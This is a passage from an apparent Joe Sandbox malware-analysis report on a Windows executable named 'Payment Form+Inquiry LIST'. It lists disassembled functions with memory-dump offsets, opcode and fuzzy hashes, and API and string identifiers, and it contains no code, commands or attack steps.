                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a0ebdd8d7a24bf8a9126832353d01b37f4c3e2a7f54e1d8a1de83156acea061e
                            • Instruction ID: fdad82ff5a1d2af1b97044230ecee229aa126aeea52ca79246b24bcf19533dac
                            • Opcode Fuzzy Hash: a0ebdd8d7a24bf8a9126832353d01b37f4c3e2a7f54e1d8a1de83156acea061e
                            • Instruction Fuzzy Hash: 07413722B19B494AEA15873792117B94252AF5A7C4F1CCB32DD0EA67D0EF3FE041824D
                            Function 00007FF6E8300910 Relevance: .1, Instructions: 91COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4f5e3a5f36c742acf23e0f67f47f7e35e288f742c5cbb7463714353c7f299c5f
                            • Instruction ID: d5cb22429859ee8c19496d398e67c37bdfb456233837e6597581ab19687ff298
                            • Opcode Fuzzy Hash: 4f5e3a5f36c742acf23e0f67f47f7e35e288f742c5cbb7463714353c7f299c5f
                            • Instruction Fuzzy Hash: 4021D733F0958186DB189F65E8502AAA263FFA8749F589134DACC87759EE3CC891C708
                            Function 00007FF6E8282580 Relevance: .1, Instructions: 71COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e44d3e9e32c8f880c8b2c10d059cd915b45a286b2b79f270ac21219de3539445
                            • Instruction ID: 9e33e12f95826af7a86535a2c6713593ffd1e9cc2a0e85e3cb813a0d877e1808
                            • Opcode Fuzzy Hash: e44d3e9e32c8f880c8b2c10d059cd915b45a286b2b79f270ac21219de3539445
                            • Instruction Fuzzy Hash: 0221CC73B1C2614AEFA4877AA39677D1350EB89780F486030DE1D43E86DD1FD591874D
                            Function 00007FF6E82535A0 Relevance: .1, Instructions: 67COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: ExceptionFailFastRaise$Sleep
                            • String ID:
                            • API String ID: 3706814929-0
                            • Opcode ID: 7b7093f65bd2b0ff49ecdfc413e7c2789058b9ef1101d239f0ad87b5e710f3ba
                            • Instruction ID: 0306752ed83c278c848bf12c9abdeeb0cf20d0d7b85359b1460a7113f5a960b0
                            • Opcode Fuzzy Hash: 7b7093f65bd2b0ff49ecdfc413e7c2789058b9ef1101d239f0ad87b5e710f3ba
                            • Instruction Fuzzy Hash: 0A214623B186414AFB208B36E555B7A7210EB98740F548031EE0FD3B88ED3ED008CB4E
                            Function 00007FF6E83008C0 Relevance: .1, Instructions: 56COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c91ad571f7de6f39c899d6f2da8f9893909e3427eea3a74341dff6ea753e2615
                            • Instruction ID: 3ff305c87088d6cba200e98105d4b5e4ee0f27341870ec59a0eb83f0654700a3
                            • Opcode Fuzzy Hash: c91ad571f7de6f39c899d6f2da8f9893909e3427eea3a74341dff6ea753e2615
                            • Instruction Fuzzy Hash: E511A033F091454BDB189F65E4502AAA262BBA8759B589134DACCCB75CFE3CC8918708
                            Function 00007FF6E82D2680 Relevance: .0, Instructions: 34COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b0fa9edb113635520e6e36d2213430e9332871d6f1d44029fa3af90c6e7f30ef
                            • Instruction ID: 73d6e4f965483cc24737a00f05ca92b6604e3ef260717112b85d5c65bb3526bd
                            • Opcode Fuzzy Hash: b0fa9edb113635520e6e36d2213430e9332871d6f1d44029fa3af90c6e7f30ef
                            • Instruction Fuzzy Hash: 4AF0F653F5420289EA14AB72FD451F992209F55780F441034D90ECB796EE2EE445838E
                            Function 00007FF6E8251988 Relevance: .0, Instructions: 31COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 956d08503f66edbf06cb58d2ba122eebf8d0324aa98dc1fffbf170e4d1119ffb
                            • Instruction ID: 38efea81bdaf90a5761bb00f2624987e88165e828661be6a77e80f9ff3f97060
                            • Opcode Fuzzy Hash: 956d08503f66edbf06cb58d2ba122eebf8d0324aa98dc1fffbf170e4d1119ffb
                            • Instruction Fuzzy Hash: D9F0A056E5810A98E904AF76EE422F8D2311F66780F4C2031D80EDB6A7AE0EE004438F
                            Function 00007FF6E8252C00 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 144librarythreadloaderCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: ConditionMaskThread$AddressProc$ContextCurrentErrorInfoLastLibraryLoadProcessResumeSuspendVerifyVersion
                            • String ID: IsWow64Process2$QueueUserAPC2$kernel32
                            • API String ID: 2652322181-269241671
                            • Opcode ID: 9709ce755b04e42be9981605d6c423657624e5586ab4d3976e82517fc70a045b
                            • Instruction ID: d5ef8547f599255c177ddcf9f5dbacdc02085ddea8bba92e8ab30739e2ce5bf3
                            • Opcode Fuzzy Hash: 9709ce755b04e42be9981605d6c423657624e5586ab4d3976e82517fc70a045b
                            • Instruction Fuzzy Hash: 7D519E32A0874285EA60DB72A5543B963A1EF98B94F444134CD5EC77D8EF3EE409C78E
                            Function 00007FF6E8252C07 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 142librarythreadloaderCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: ConditionMaskThread$AddressProc$ContextCurrentErrorInfoLastLibraryLoadProcessResumeSuspendVerifyVersion
                            • String ID: IsWow64Process2$QueueUserAPC2$kernel32
                            • API String ID: 2652322181-269241671
                            • Opcode ID: 9fba28cf1afb429e11db75650f3934dc10554abb7736396653c39c14cc915cad
                            • Instruction ID: 1e867ba4868795505b7a4c3b1d48ecd0905de8733857659dd9dd73730faf72a0
                            • Opcode Fuzzy Hash: 9fba28cf1afb429e11db75650f3934dc10554abb7736396653c39c14cc915cad
                            • Instruction Fuzzy Hash: 8C519E32A0874285EA60DB72A5503B963A1EF98B94F444134CD5EC7798EF3EE409C78E
                            Function 00007FF6E825D7A0 Relevance: 24.1, APIs: 8, Strings: 8, Instructions: 101stringCOMMON
                            Download Yara Rule
                            APIs
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825D7DE
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825D806
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825D826
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825D846
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825D866
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825D88A
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825D8AE
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825D8D2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: strcmp
                            • String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent
                            • API String ID: 1004003707-945519297
                            • Opcode ID: bcebf5a6f252cbb09dfa09eef273a2f758d43f54852196089d452d364a587b90
                            • Instruction ID: 4668094d9405b350d7c41661c4d3882ede2982d4bea1c4a92d67975b6f78e50d
                            • Opcode Fuzzy Hash: bcebf5a6f252cbb09dfa09eef273a2f758d43f54852196089d452d364a587b90
                            • Instruction Fuzzy Hash: D2414056E48A4295F652A736AA003B413A1AF01BF4F540371D87C976DDDF2EE846C38F
                            Function 00007FF6E825C770 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                            • String ID: InitializeContext2$kernel32.dll
                            • API String ID: 4102459504-3117029998
                            • Opcode ID: 16d3fee5cfa0fcf09c2cb1223e46ebea1838c8a0d7b597ddaf9c999af425626a
                            • Instruction ID: 0b4fbeec6ea90c9709b0fe79428b4b763649b759ce5037482d8595f405432ded
                            • Opcode Fuzzy Hash: 16d3fee5cfa0fcf09c2cb1223e46ebea1838c8a0d7b597ddaf9c999af425626a
                            • Instruction Fuzzy Hash: DD31A223B18B4681EA11CBB0A5443796391EF48B90F080435DD5C82798EF7EE446C75E
                            Function 00007FF6E8252FB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                            • String ID:
                            • API String ID: 510365852-3916222277
                            • Opcode ID: cf3d6e846313f3faf6da6ddee579c375e6772a5ff4c8a8f0db3351e708a0123f
                            • Instruction ID: 781455bfd684b064f6bc1294e117417759e23aafb7e7b91c5717e0f7d41d9698
                            • Opcode Fuzzy Hash: cf3d6e846313f3faf6da6ddee579c375e6772a5ff4c8a8f0db3351e708a0123f
                            • Instruction Fuzzy Hash: 4211C273A08B818AD760EF65B4402DA7350FB457B4F140335E6BD4BADACF39D4428789
                            Function 00007FF6E8287820 Relevance: 7.6, APIs: 6, Instructions: 138COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            • Opcode ID: 923e4c15c36c671b645af422b1c922f83f6391a097a5c1f7a03866067d5f11e0
                            • Instruction ID: b1311e04ce0aace3cdf363404c38bb4e058fc323ac5d4acb55a397905a7ba25f
                            • Opcode Fuzzy Hash: 923e4c15c36c671b645af422b1c922f83f6391a097a5c1f7a03866067d5f11e0
                            • Instruction Fuzzy Hash: B1613923A1DA8AC9EE509B21EA813B573A4EF85790F550031D99DC3761DF3EE049C78E
                            Function 00007FF6E8282B50 Relevance: 7.6, APIs: 6, Instructions: 119COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            • Opcode ID: 95a3fec7bfcf4f7b88a60be85c82b2bde261c563bd8ac75406ddc58967cceedc
                            • Instruction ID: 373e52dd85f6e247394d8545e305666063ac06d8ab8e669f88ef249aa931619a
                            • Opcode Fuzzy Hash: 95a3fec7bfcf4f7b88a60be85c82b2bde261c563bd8ac75406ddc58967cceedc
                            • Instruction Fuzzy Hash: 6351493791DB8AC9EA609F20EA403B973A4EF95790F450035C99DC3665DF3EE058878E
                            Function 00007FF6E8253A80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: ExceptionFailFastRaise
                            • String ID: Process is terminating due to StackOverflowException.
                            • API String ID: 2546344036-2200901744
                            • Opcode ID: 7cf52375af1028233e90cac4dcea04e721c70769caab80c77cf0b8a6fae5d76c
                            • Instruction ID: 3e7174d438a787a998216eba453d04825e9ac083174ed7bdf426f971890b3a84
                            • Opcode Fuzzy Hash: 7cf52375af1028233e90cac4dcea04e721c70769caab80c77cf0b8a6fae5d76c
                            • Instruction Fuzzy Hash: 4B51C623B49B4289EF508B29D5943796390EF49B94F049031DA1EC77B8DF2EE455838F
                            Function 00007FF6E8291540 Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: SwitchThread
                            • String ID:
                            • API String ID: 115865932-0
                            • Opcode ID: b9b0ab16afc07ccf16aeca724bf885404bfb9df2ed0c540a79699a48ff797aa1
                            • Instruction ID: 6c1ec8df02cda9048c886b795155c1d215a6066fd425cdb425bffc371e6eefe1
                            • Opcode Fuzzy Hash: b9b0ab16afc07ccf16aeca724bf885404bfb9df2ed0c540a79699a48ff797aa1
                            • Instruction Fuzzy Hash: 41417533F096468AEB648E36D2407797250EB40BD4F588139D64FC67C9DE3EE440A79E
                            Function 00007FF6E825C8E0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                            Download Yara Rule
                            APIs
